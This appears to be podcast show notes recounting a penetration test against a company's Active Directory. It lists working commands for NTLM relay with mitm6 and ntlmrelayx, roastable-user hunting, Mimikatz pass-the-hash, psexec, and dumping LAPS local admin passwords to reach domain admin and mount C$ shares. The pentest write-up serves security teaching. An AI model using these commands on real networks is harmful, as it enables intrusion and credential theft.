SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Hey everybody! Sorry that we're late again with today's episode, but I got COVID shot #2 and it kicked my behind BIG TIME today. But I'm vertical today and back amongst the living and thrilled to be sharing with you another tale of pentest pwnage! Yeah! This might be my favorite tale yet because:
I got to use some of my new CRTP skills!
Make sure on your pentests that you're looking for "roastable" users. Harmj0y has a great article on this, but the TLDR is make sure you run PowerView with the
-PreauthNotRequiredflag to hunt for these users:
Check for misconfigured LAPS installs with Get-LAPSPasswords!
The combination of
mitm6.py -i eth0 -d company.local --no-ra --ignore-nofqdn+
ntlmrelayx -t ldaps://domain.controller.ip.address -wh attacker-wpad --delegate-accessis reeeeeealllllyyyyyyy awesome and effective!
When you are doing the
--delegate-accesstrick, don't ignore (like I did for years) if you get administrative impersonation access on a regular workstation. You can still abuse it by impersonating an admin, run secretsdump or pilfer the machine for additional goodies!
SharpShares is a cool way to find shares your account has access to.
I didn't get to use it on this engagement but Chisel looks to be a rad way to tunnel information
Once you've dumped all the domain hashes with secretsdump, don't forget (like me) that you can do some nice Mimikatz'ing to leverage those hashes! For example:
sekurlsa::pth /user:administrator /ntlm:hash-of-the-administrator-user /domain:yourdomain.com
Do that and bam! a new command prompt opens with administrator privileges! Keep in mind though, if you do a
whoami you will still be SOMEWORKSTATION\joeblo, but you can do something like
psexec \\VICTIM-SERVER cmd.exe and then do a
whoami and then POW! - you're running as domain admin!
Once you've got domain admin access, why not run Get-LAPSPasswords again to get all the local admin passwords across the whole enterprise? Or you can do
get-netcomputer VICTIM-SERVERand look for the
mc-mcs-admpwdvalue - which is the LAPS password! Whooee!!! That's fun!
Armed with all the local admin passwords, I was able to run
net use Q: \\VICTIM-SERVER\C$" /user:Adminisrator LAPS-PASSWORDto hook a network drive to that share. You can also do
net view \\VICTIM-SERVER\to see all the shares you can hook to. And that gave me all the info I needed to find the company's crowned jewels :-)